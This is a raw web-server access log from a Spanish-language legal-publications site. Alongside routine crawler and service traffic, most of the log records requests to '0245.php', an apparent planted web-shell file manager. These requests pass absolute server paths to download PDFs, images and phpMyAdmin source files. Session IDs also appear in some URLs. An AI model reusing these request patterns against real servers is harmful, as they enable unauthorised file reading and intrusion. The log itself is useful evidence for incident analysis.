40.77.167.7 - - [20/Jun/2024:02:23:39 -0500] "GET /Publicaciones/2024EE100080.pdf HTTP/1.1" 404 228
172.22.2.4 - - [20/Jun/2024:02:23:41 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%203%20del%2023%20de%20Marzo%20de%202012.pdf HTTP/1.1" 304 -
201.245.192.253 - - [20/Jun/2024:02:23:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [20/Jun/2024:02:23:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.43.243 - - [20/Jun/2024:02:23:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cidpyba%5C&f=idpyba.html&ft=download HTTP/1.1" 200 13027
201.245.192.253 - - [20/Jun/2024:02:24:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:24:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.27.185 - - [20/Jun/2024:02:24:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2348.pdf&ft=download HTTP/1.1" 200 388775
66.249.66.21 - - [20/Jun/2024:02:25:18 -0500] "GET /Publicaciones/2024EE79012.pdf HTTP/1.1" 404 227
47.128.41.25 - - [20/Jun/2024:02:25:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-snapshots&f=20150910_encuentrodelasamericas_55f8075ee0b2f1658150915115614_scan.json&ft=download HTTP/1.1" 200 294504
172.22.2.4 - - [20/Jun/2024:02:23:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:25:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:02:25:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.58.116 - - [20/Jun/2024:02:26:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1903.pdf&ft=notepad&white=1 HTTP/1.1" 200 347849
172.22.2.4 - - [20/Jun/2024:02:24:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49224
172.22.2.4 - - [20/Jun/2024:02:24:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49794
201.245.192.253 - - [20/Jun/2024:02:26:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:26:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.58.110 - - [20/Jun/2024:02:26:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Csig%5CGestion+Documental%5Cdlf%5C&f=trans.gif&ft=img&white=1 HTTP/1.1" 200 49
201.245.192.253 - - [20/Jun/2024:02:27:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.98.104 - - [20/Jun/2024:02:27:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0112.pdf&ft=notepad&white=1 HTTP/1.1" 200 822985
201.245.192.253 - - [20/Jun/2024:02:27:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33228
201.245.192.253 - - [20/Jun/2024:02:27:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34815
201.245.192.253 - - [20/Jun/2024:02:27:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.43.180 - - [20/Jun/2024:02:28:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6551.pdf&ft=img&white=1 HTTP/1.1" 200 356111
201.245.192.253 - - [20/Jun/2024:02:28:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:02:28:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:28:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:02:28:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.120.184 - - [20/Jun/2024:02:29:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2746.pdf&ft=img&white=1 HTTP/1.1" 200 1240847
201.245.192.253 - - [20/Jun/2024:02:29:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.161 - - [20/Jun/2024:02:29:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2304.pdf HTTP/1.1" 304 -
201.245.192.253 - - [20/Jun/2024:02:29:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33557
47.128.126.14 - - [20/Jun/2024:02:29:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2133.pdf&ft=notepad&white=1 HTTP/1.1" 200 376521
201.245.192.253 - - [20/Jun/2024:02:29:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:30:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34815
201.245.192.253 - - [20/Jun/2024:02:30:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:30:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.48.160 - - [20/Jun/2024:02:30:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2343.pdf&ft=notepad&white=1 HTTP/1.1" 200 392905
172.22.2.4 - - [20/Jun/2024:02:29:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.126.189 - - [20/Jun/2024:02:31:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=6216.pdf&ft=img&white=1 HTTP/1.1" 200 1556239
201.245.192.253 - - [20/Jun/2024:02:31:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:02:31:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.45.3 - - [20/Jun/2024:02:32:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000&f=00002974.tif HTTP/1.1" 200 17751
47.128.45.3 - - [20/Jun/2024:02:32:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.45.3 - - [20/Jun/2024:02:32:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.45.3 - - [20/Jun/2024:02:32:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.45.3 - - [20/Jun/2024:02:32:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.45.3 - - [20/Jun/2024:02:32:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.45.3 - - [20/Jun/2024:02:32:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.45.3 - - [20/Jun/2024:02:32:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.45.3 - - [20/Jun/2024:02:32:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.45.3 - - [20/Jun/2024:02:32:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_tif HTTP/1.1" 200 175
47.128.45.3 - - [20/Jun/2024:02:32:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
172.22.2.4 - - [20/Jun/2024:02:30:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [20/Jun/2024:02:32:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:32:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.161 - - [20/Jun/2024:02:32:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2178.pdf HTTP/1.1" 304 -
47.128.120.228 - - [20/Jun/2024:02:32:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1473.pdf&ft=img&white=1 HTTP/1.1" 200 20239
216.245.221.92 - - [20/Jun/2024:02:33:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:33:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.114.85 - - [20/Jun/2024:02:33:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2251-2300%5C&f=00002298.tif&white=1 HTTP/1.1" 200 144422
201.245.192.253 - - [20/Jun/2024:02:33:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
201.245.192.253 - - [20/Jun/2024:02:33:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.41.224 - - [20/Jun/2024:02:34:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0240.pdf&ft=notepad&white=1 HTTP/1.1" 200 20169
201.245.192.253 - - [20/Jun/2024:02:34:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:34:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.110.110 - - [20/Jun/2024:02:34:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2791.pdf&ft=notepad&white=1 HTTP/1.1" 200 401097
201.245.192.253 - - [20/Jun/2024:02:35:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.121.93 - - [20/Jun/2024:02:35:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4562.pdf&ft=img&white=1 HTTP/1.1" 200 839439
201.245.192.253 - - [20/Jun/2024:02:35:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:36:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:36:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.50.29 - - [20/Jun/2024:02:36:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000243.tif&ft=img&white=1 HTTP/1.1" 200 241412
172.22.2.4 - - [20/Jun/2024:02:35:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.58.117 - - [20/Jun/2024:02:37:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3930.pdf&ft=notepad&white=1 HTTP/1.1" 200 376521
201.245.192.253 - - [20/Jun/2024:02:37:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:02:37:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33228
201.245.192.253 - - [20/Jun/2024:02:37:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34815
201.245.192.253 - - [20/Jun/2024:02:37:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [20/Jun/2024:02:36:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
47.128.116.239 - - [20/Jun/2024:02:37:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=0670.pdf&ft=notepad&white=1 HTTP/1.1" 200 335561
201.245.192.253 - - [20/Jun/2024:02:38:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:02:38:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:38:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:02:38:42 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.57.65 - - [20/Jun/2024:02:38:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=0294.pdf&ft=notepad&white=1 HTTP/1.1" 200 74701
201.245.192.253 - - [20/Jun/2024:02:39:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.57.92 - - [20/Jun/2024:02:39:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000211.tif&ft=img&white=1 HTTP/1.1" 200 20228
201.245.192.253 - - [20/Jun/2024:02:39:41 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33557
201.245.192.253 - - [20/Jun/2024:02:39:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.121.228 - - [20/Jun/2024:02:40:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=mysql_charsets.inc.php&ft=img&white=1 HTTP/1.1" 200 4961
216.244.66.195 - - [20/Jun/2024:02:40:18 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [20/Jun/2024:02:40:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 34815
201.245.192.253 - - [20/Jun/2024:02:40:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:40:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.59.50 - - [20/Jun/2024:02:40:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2088.pdf&ft=notepad&white=1 HTTP/1.1" 200 356041
201.245.192.253 - - [20/Jun/2024:02:41:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.123.101 - - [20/Jun/2024:02:41:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2251-2300%5C&f=00002293.tif&white=1 HTTP/1.1" 200 35022
201.245.192.253 - - [20/Jun/2024:02:41:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.51.63 - - [20/Jun/2024:02:42:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5228.pdf&ft=notepad&white=1 HTTP/1.1" 200 245449
201.245.192.253 - - [20/Jun/2024:02:42:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:42:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:02:41:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.126.240 - - [20/Jun/2024:02:43:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=1297.pdf&ft=notepad&white=1 HTTP/1.1" 200 458441
216.245.221.92 - - [20/Jun/2024:02:43:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:43:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:02:43:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
172.22.2.4 - - [20/Jun/2024:02:42:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [20/Jun/2024:02:43:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.46.133 - - [20/Jun/2024:02:43:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4067.pdf&ft=img&white=1 HTTP/1.1" 200 20239
201.245.192.253 - - [20/Jun/2024:02:44:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:44:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.112.59 - - [20/Jun/2024:02:44:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=5485.pdf&ft=notepad&white=1 HTTP/1.1" 200 2305737
47.128.21.97 - - [20/Jun/2024:02:45:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4400.pdf&ft=img&white=1 HTTP/1.1" 200 388879
201.245.192.253 - - [20/Jun/2024:02:45:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.254 - - [20/Jun/2024:02:45:41 -0500] "GET /Publicaciones/2024EE98266.pdf HTTP/1.1" 404 227
201.245.192.253 - - [20/Jun/2024:02:45:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.121.104 - - [20/Jun/2024:02:46:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2200.pdf&ft=img&white=1 HTTP/1.1" 200 35086
201.245.192.253 - - [20/Jun/2024:02:46:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:46:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.48.69 - - [20/Jun/2024:02:46:56 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=2561.pdf&ft=notepad&white=1 HTTP/1.1" 200 391968
201.245.192.253 - - [20/Jun/2024:02:47:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.53.175 - - [20/Jun/2024:02:47:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Crequerimientos_old%5C&f=footer.php&ft=img&white=1 HTTP/1.1" 200 557
201.245.192.253 - - [20/Jun/2024:02:47:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.49.121 - - [20/Jun/2024:02:48:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4140.pdf&ft=img&white=1 HTTP/1.1" 200 245519
201.245.192.253 - - [20/Jun/2024:02:48:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [20/Jun/2024:02:48:27 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Jun/2024:02:48:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Jun/2024:02:48:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
172.22.2.4 - - [20/Jun/2024:02:47:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.25.176 - - [20/Jun/2024:02:49:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3933.pdf&ft=notepad&white=1 HTTP/1.1" 200 360137
201.245.192.253 - - [20/Jun/2024:02:49:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [20/Jun/2024:02:47:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [20/Jun/2024:02:49:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.16.111 - - [20/Jun/2024:02:49:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006++2951-3000%5C&f=00002956.tif&white=1 HTTP/1.1" 200 71870
201.245.192.253 - - [20/Jun/2024:02:50:27 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [20/Jun/2024:02:50:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.96.141 - - [20/Jun/2024:02:50:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5C&f=2514.pdf&ft=notepad&white=1 HTTP/1.1" 200 102443
47.128.36.128 - - [20/Jun/2024:02:51:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+2251-2300%5C&f=00002258.tif&white=1 HTTP/1.1" 200 425732
201.245.192.253 - - [20/Jun/2024:02:51:28 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [20/Jun/2024:02:51:39 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/6049.pdf HTTP/1.1" 304 -
201.245.192.253 - - [20/Jun/2024:02:51:48 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.58.103 - - [20/Jun/2024:02:52:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=4612.pdf&ft=img&white=1 HTTP/1.1" 200 356111
